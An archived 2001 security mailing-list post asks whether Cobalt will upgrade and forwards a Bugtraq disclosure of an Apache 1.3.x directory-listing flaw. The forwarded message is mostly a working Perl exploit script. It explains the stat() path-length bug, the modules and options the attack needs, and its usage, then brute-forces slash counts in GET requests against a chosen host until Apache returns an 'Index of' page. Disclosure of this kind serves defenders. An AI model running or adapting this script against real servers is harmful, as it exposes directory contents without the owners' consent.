[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)

Subject: [cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)
From: ProServe - Peter Batenburg <peter@xxxxxxxxxxx>
Date: Wed, 13 Jun 2001 21:30:39 +0200 (CEST)
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

Is Cobalt going to upgrade?

With kind regards,

Peter Batenburg

ProServe
Prisma 100
3364 DJ Sliedrecht
Tel.: 0184 - 423 815
Fax: 0184 - 417 160
http://www.proserve.nl

**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the sender by replying the email and please remove
the files from your computer.

This footnote also confirms that this email message has been swept
for the presence of computer viruses.
**********************************************************************

---------- Forwarded message ----------
Date: Wed, 13 Jun 2001 02:44:35 -0500
From: Matt Watchinski <matt@xxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory
    Listing  Exploit

#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a
directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file
that in
#	   very specific cases would feed stat() a filename that was longer
than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of
the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values
*/
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important
part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be
enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache
for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to
us>
#               Anne for being so sexy <I never though corporate
espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#

use IO::Socket;

$low  = $ARGV[3]; #Low number of slash characters to try
$hi   = $ARGV[2]; #High number of slash characters to try
$port = $ARGV[1]; #Port to try to connect to
$host = $ARGV[0]; #Host to try to connect to

# Main loop.  Not much to this exploit once you figure out what needed
to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a differnt
number
# of /.  Send me the numbers if you don't mind matt@xxxxxxxxx

while($low <= $hi)
{

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "TCP") or die "Connect Failed";

  $url = "";
  $buffer = "";
  $end = "";

  $url = "GET ";
  $buffer = "/" x $low . " HTTP/1.0\r\n";
  $end = "\r\n\r\n";

  $url = $url . $buffer . $end;

  print $socket "$url";
  while(<$socket>)
  {
    if($_ =~ "Index of")
    {
      print "Found the magic number: $low\n";
      print "Now go do it by hand to to see it all\n";
      close($socket);
      exit;
    }
  }

  close($socket);
  $low++
}

Follow-Ups:
- Re: [cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)
  - From: Jeff Lovell
- Re: [cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path DirectoryListing Exploit (fwd)
  - From: Carrie Bartkowiak

Prev by Date: RE: [cobalt-security] fpipe - interesting security experiment
Next by Date: Re: [cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)
Previous by thread: RE: [cobalt-security] fpipe - interesting security experiment
Next by thread: Re: [cobalt-security] Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index